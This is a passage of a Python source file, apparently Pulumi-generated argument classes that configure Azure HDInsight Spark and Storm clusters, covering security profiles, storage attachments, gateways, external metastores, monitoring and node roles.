        Enterprise Security Package profile for an HDInsight Spark Cluster.

        :param pulumi.Input[str] aadds_resource_id: The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_name: The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_user_password: The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_username: The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ldaps_urls: A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
        :param pulumi.Input[str] msi_resource_id: The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] cluster_users_group_dns: A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
        """
        for key, val in (("aadds_resource_id", aadds_resource_id),
                         ("domain_name", domain_name),
                         ("domain_user_password", domain_user_password),
                         ("domain_username", domain_username),
                         ("ldaps_urls", ldaps_urls),
                         ("msi_resource_id", msi_resource_id)):
            pulumi.set(__self__, key, val)
        # The user-group DNs are the only optional field of the profile.
        if cluster_users_group_dns is not None:
            pulumi.set(__self__, "cluster_users_group_dns", cluster_users_group_dns)

    @property
    @pulumi.getter(name="aaddsResourceId")
    def aadds_resource_id(self) -> pulumi.Input[str]:
        """The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created."""
        return pulumi.get(self, "aadds_resource_id")

    @aadds_resource_id.setter
    def aadds_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "aadds_resource_id", value)

    @property
    @pulumi.getter(name="domainName")
    def domain_name(self) -> pulumi.Input[str]:
        """The name of the Azure Active Directory Domain. Changing this forces a new resource to be created."""
        return pulumi.get(self, "domain_name")

    @domain_name.setter
    def domain_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_name", value)

    @property
    @pulumi.getter(name="domainUserPassword")
    def domain_user_password(self) -> pulumi.Input[str]:
        """The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created."""
        return pulumi.get(self, "domain_user_password")

    @domain_user_password.setter
    def domain_user_password(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_user_password", value)

    @property
    @pulumi.getter(name="domainUsername")
    def domain_username(self) -> pulumi.Input[str]:
        """The username of the Azure Active Directory Domain. Changing this forces a new resource to be created."""
        return pulumi.get(self, "domain_username")

    @domain_username.setter
    def domain_username(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_username", value)

    @property
    @pulumi.getter(name="ldapsUrls")
    def ldaps_urls(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ldaps_urls")

    @ldaps_urls.setter
    def ldaps_urls(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "ldaps_urls", value)

    @property
    @pulumi.getter(name="msiResourceId")
    def msi_resource_id(self) -> pulumi.Input[str]:
        """The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created."""
        return pulumi.get(self, "msi_resource_id")

    @msi_resource_id.setter
    def msi_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "msi_resource_id", value)

    @property
    @pulumi.getter(name="clusterUsersGroupDns")
    def cluster_users_group_dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created."""
        return pulumi.get(self, "cluster_users_group_dns")

    @cluster_users_group_dns.setter
    def cluster_users_group_dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "cluster_users_group_dns", value)
@pulumi.input_type
class SparkClusterStorageAccountArgs:
    def __init__(__self__, *,
                 is_default: pulumi.Input[bool],
                 storage_account_key: pulumi.Input[str],
                 storage_container_id: pulumi.Input[str]):
        """
        Blob storage account attachment for an HDInsight Spark Cluster.

        NOTE(review): the upstream docstrings said "Hadoop Cluster" here, which
        looks like a generator copy-paste; this class is referenced by the Spark
        cluster resource — confirm against the provider schema.

        :param pulumi.Input[bool] is_default: Is this the Default Storage Account for the cluster? Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_account_key: The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
        """
        for key, val in (("is_default", is_default),
                         ("storage_account_key", storage_account_key),
                         ("storage_container_id", storage_container_id)):
            pulumi.set(__self__, key, val)

    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """Is this the Default Storage Account for the cluster? Changing this forces a new resource to be created."""
        return pulumi.get(self, "is_default")

    @is_default.setter
    def is_default(self, value: pulumi.Input[bool]):
        pulumi.set(self, "is_default", value)

    @property
    @pulumi.getter(name="storageAccountKey")
    def storage_account_key(self) -> pulumi.Input[str]:
        """The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_account_key")

    @storage_account_key.setter
    def storage_account_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_account_key", value)

    @property
    @pulumi.getter(name="storageContainerId")
    def storage_container_id(self) -> pulumi.Input[str]:
        """The ID of the Storage Container. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_container_id")

    @storage_container_id.setter
    def storage_container_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_container_id", value)
@pulumi.input_type
class SparkClusterStorageAccountGen2Args:
    def __init__(__self__, *,
                 filesystem_id: pulumi.Input[str],
                 is_default: pulumi.Input[bool],
                 managed_identity_resource_id: pulumi.Input[str],
                 storage_resource_id: pulumi.Input[str]):
        """
        ADLS Gen2 storage attachment for an HDInsight Spark Cluster.

        :param pulumi.Input[str] filesystem_id: The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] is_default: Is this the Default Storage Account for the cluster? Changing this forces a new resource to be created.
        :param pulumi.Input[str] managed_identity_resource_id: The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_resource_id: The ID of the Storage Account. Changing this forces a new resource to be created.
        """
        for key, val in (("filesystem_id", filesystem_id),
                         ("is_default", is_default),
                         ("managed_identity_resource_id", managed_identity_resource_id),
                         ("storage_resource_id", storage_resource_id)):
            pulumi.set(__self__, key, val)

    @property
    @pulumi.getter(name="filesystemId")
    def filesystem_id(self) -> pulumi.Input[str]:
        """The ID of the Gen2 Filesystem. Changing this forces a new resource to be created."""
        return pulumi.get(self, "filesystem_id")

    @filesystem_id.setter
    def filesystem_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "filesystem_id", value)

    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """Is this the Default Storage Account for the cluster? Changing this forces a new resource to be created."""
        return pulumi.get(self, "is_default")

    @is_default.setter
    def is_default(self, value: pulumi.Input[bool]):
        pulumi.set(self, "is_default", value)

    @property
    @pulumi.getter(name="managedIdentityResourceId")
    def managed_identity_resource_id(self) -> pulumi.Input[str]:
        """The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created."""
        return pulumi.get(self, "managed_identity_resource_id")

    @managed_identity_resource_id.setter
    def managed_identity_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "managed_identity_resource_id", value)

    @property
    @pulumi.getter(name="storageResourceId")
    def storage_resource_id(self) -> pulumi.Input[str]:
        """The ID of the Storage Account. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_resource_id")

    @storage_resource_id.setter
    def storage_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_resource_id", value)
@pulumi.input_type
class StormClusterComponentVersionArgs:
    def __init__(__self__, *,
                 storm: pulumi.Input[str]):
        """
        Component version pin for an HDInsight Storm Cluster.

        :param pulumi.Input[str] storm: The version of Storm which should be used for this HDInsight Storm Cluster. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "storm", storm)

    @property
    @pulumi.getter
    def storm(self) -> pulumi.Input[str]:
        """The version of Storm which should be used for this HDInsight Storm Cluster. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storm")

    @storm.setter
    def storm(self, value: pulumi.Input[str]):
        pulumi.set(self, "storm", value)
@pulumi.input_type
class StormClusterGatewayArgs:
    def __init__(__self__, *,
                 password: pulumi.Input[str],
                 username: pulumi.Input[str],
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        Ambari gateway credentials for an HDInsight Storm Cluster.

        :param pulumi.Input[str] password: The password used for the Ambari Portal.
        :param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "username", username)
        if enabled is not None:
            # Deprecated field: warn once, but keep storing it for backward compatibility.
            # (Previously this condition was tested twice in a row; the two guards are merged.)
            warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
            pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
            pulumi.set(__self__, "enabled", enabled)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The password used for the Ambari Portal.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The username used for the Ambari Portal. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class StormClusterMetastoresArgs:
    def __init__(__self__, *,
                 ambari: Optional[pulumi.Input['StormClusterMetastoresAmbariArgs']] = None,
                 hive: Optional[pulumi.Input['StormClusterMetastoresHiveArgs']] = None,
                 oozie: Optional[pulumi.Input['StormClusterMetastoresOozieArgs']] = None):
        """
        External metastore configuration for an HDInsight Storm Cluster.

        :param pulumi.Input['StormClusterMetastoresAmbariArgs'] ambari: An `ambari` block as defined below.
        :param pulumi.Input['StormClusterMetastoresHiveArgs'] hive: A `hive` block as defined below.
        :param pulumi.Input['StormClusterMetastoresOozieArgs'] oozie: An `oozie` block as defined below.
        """
        # Every metastore is optional; record only those provided.
        for key, val in (("ambari", ambari), ("hive", hive), ("oozie", oozie)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def ambari(self) -> Optional[pulumi.Input['StormClusterMetastoresAmbariArgs']]:
        """An `ambari` block as defined below."""
        return pulumi.get(self, "ambari")

    @ambari.setter
    def ambari(self, value: Optional[pulumi.Input['StormClusterMetastoresAmbariArgs']]):
        pulumi.set(self, "ambari", value)

    @property
    @pulumi.getter
    def hive(self) -> Optional[pulumi.Input['StormClusterMetastoresHiveArgs']]:
        """A `hive` block as defined below."""
        return pulumi.get(self, "hive")

    @hive.setter
    def hive(self, value: Optional[pulumi.Input['StormClusterMetastoresHiveArgs']]):
        pulumi.set(self, "hive", value)

    @property
    @pulumi.getter
    def oozie(self) -> Optional[pulumi.Input['StormClusterMetastoresOozieArgs']]:
        """An `oozie` block as defined below."""
        return pulumi.get(self, "oozie")

    @oozie.setter
    def oozie(self, value: Optional[pulumi.Input['StormClusterMetastoresOozieArgs']]):
        pulumi.set(self, "oozie", value)
@pulumi.input_type
class StormClusterMetastoresAmbariArgs:
    # External Ambari metastore connection settings (SQL server backed).
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Ambari metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "database_name", database_name)
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "server", server)
        pulumi.set(__self__, "username", username)
    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL database. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")
    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)
    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """
        The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "server")
    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class StormClusterMetastoresHiveArgs:
    """External Hive metastore connection settings (SQL server backed)."""

    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        # All four connection settings are required; store them in order.
        for attr, arg in (("database_name", database_name),
                          ("password", password),
                          ("server", server),
                          ("username", username)):
            pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL database. Changing this forces a new resource to be created."""
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "database_name", new_value)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "password", new_value)

    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created."""
        return pulumi.get(self, "server")

    @server.setter
    def server(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "server", new_value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "username", new_value)
@pulumi.input_type
class StormClusterMetastoresOozieArgs:
    """External Oozie metastore connection settings (SQL server backed)."""

    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        # All four connection settings are required; store them in order.
        for attr, arg in (("database_name", database_name),
                          ("password", password),
                          ("server", server),
                          ("username", username)):
            pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created."""
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "database_name", new_value)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "password", new_value)

    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created."""
        return pulumi.get(self, "server")

    @server.setter
    def server(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "server", new_value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "username", new_value)
@pulumi.input_type
class StormClusterMonitorArgs:
    """Azure Monitor (OMS) integration settings for a Storm cluster."""

    def __init__(__self__, *,
                 log_analytics_workspace_id: pulumi.Input[str],
                 primary_key: pulumi.Input[str]):
        """
        :param pulumi.Input[str] log_analytics_workspace_id: The Operations Management Suite (OMS) workspace ID.
        :param pulumi.Input[str] primary_key: The Operations Management Suite (OMS) workspace key.
        """
        # Both settings are required for monitoring to be enabled.
        for attr, arg in (("log_analytics_workspace_id", log_analytics_workspace_id),
                          ("primary_key", primary_key)):
            pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="logAnalyticsWorkspaceId")
    def log_analytics_workspace_id(self) -> pulumi.Input[str]:
        """The Operations Management Suite (OMS) workspace ID."""
        return pulumi.get(self, "log_analytics_workspace_id")

    @log_analytics_workspace_id.setter
    def log_analytics_workspace_id(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "log_analytics_workspace_id", new_value)

    @property
    @pulumi.getter(name="primaryKey")
    def primary_key(self) -> pulumi.Input[str]:
        """The Operations Management Suite (OMS) workspace key."""
        return pulumi.get(self, "primary_key")

    @primary_key.setter
    def primary_key(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "primary_key", new_value)
@pulumi.input_type
class StormClusterRolesArgs:
    """The three required node-role blocks of an HDInsight Storm cluster."""

    def __init__(__self__, *,
                 head_node: pulumi.Input['StormClusterRolesHeadNodeArgs'],
                 worker_node: pulumi.Input['StormClusterRolesWorkerNodeArgs'],
                 zookeeper_node: pulumi.Input['StormClusterRolesZookeeperNodeArgs']):
        """
        :param pulumi.Input['StormClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
        :param pulumi.Input['StormClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
        :param pulumi.Input['StormClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
        """
        # All three role blocks are mandatory; store them in order.
        for attr, block in (("head_node", head_node),
                            ("worker_node", worker_node),
                            ("zookeeper_node", zookeeper_node)):
            pulumi.set(__self__, attr, block)

    @property
    @pulumi.getter(name="headNode")
    def head_node(self) -> pulumi.Input['StormClusterRolesHeadNodeArgs']:
        """A `head_node` block as defined above."""
        return pulumi.get(self, "head_node")

    @head_node.setter
    def head_node(self, new_value: pulumi.Input['StormClusterRolesHeadNodeArgs']):
        pulumi.set(self, "head_node", new_value)

    @property
    @pulumi.getter(name="workerNode")
    def worker_node(self) -> pulumi.Input['StormClusterRolesWorkerNodeArgs']:
        """A `worker_node` block as defined below."""
        return pulumi.get(self, "worker_node")

    @worker_node.setter
    def worker_node(self, new_value: pulumi.Input['StormClusterRolesWorkerNodeArgs']):
        pulumi.set(self, "worker_node", new_value)

    @property
    @pulumi.getter(name="zookeeperNode")
    def zookeeper_node(self) -> pulumi.Input['StormClusterRolesZookeeperNodeArgs']:
        """A `zookeeper_node` block as defined below."""
        return pulumi.get(self, "zookeeper_node")

    @zookeeper_node.setter
    def zookeeper_node(self, new_value: pulumi.Input['StormClusterRolesZookeeperNodeArgs']):
        pulumi.set(self, "zookeeper_node", new_value)
@pulumi.input_type
class StormClusterRolesHeadNodeArgs:
    """Head-node configuration for an HDInsight Storm cluster."""

    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional settings are only stored when explicitly provided.
        for attr, arg in (("password", password),
                          ("ssh_keys", ssh_keys),
                          ("subnet_id", subnet_id),
                          ("virtual_network_id", virtual_network_id)):
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "username", new_value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", new_value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", new_value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", new_value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", new_value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", new_value)
@pulumi.input_type
class StormClusterRolesWorkerNodeArgs:
    """Worker-node configuration for an HDInsight Storm cluster."""

    def __init__(__self__, *,
                 target_instance_count: pulumi.Input[int],
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 min_instance_count: Optional[pulumi.Input[int]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
        :param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "target_instance_count", target_instance_count)
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        if min_instance_count is not None:
            # Deprecated upstream: warn, then still record the value so
            # existing configurations keep working.
            warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
            pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
            pulumi.set(__self__, "min_instance_count", min_instance_count)
        # Remaining optional settings are only stored when explicitly provided.
        for attr, arg in (("password", password),
                          ("ssh_keys", ssh_keys),
                          ("subnet_id", subnet_id),
                          ("virtual_network_id", virtual_network_id)):
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """The number of instances which should be run for the Worker Nodes."""
        return pulumi.get(self, "target_instance_count")

    @target_instance_count.setter
    def target_instance_count(self, new_value: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", new_value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "username", new_value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", new_value)

    @property
    @pulumi.getter(name="minInstanceCount")
    def min_instance_count(self) -> Optional[pulumi.Input[int]]:
        """The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "min_instance_count")

    @min_instance_count.setter
    def min_instance_count(self, new_value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_instance_count", new_value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", new_value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", new_value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", new_value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", new_value)
@pulumi.input_type
class StormClusterRolesZookeeperNodeArgs:
    """Zookeeper-node configuration for an HDInsight Storm cluster."""

    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
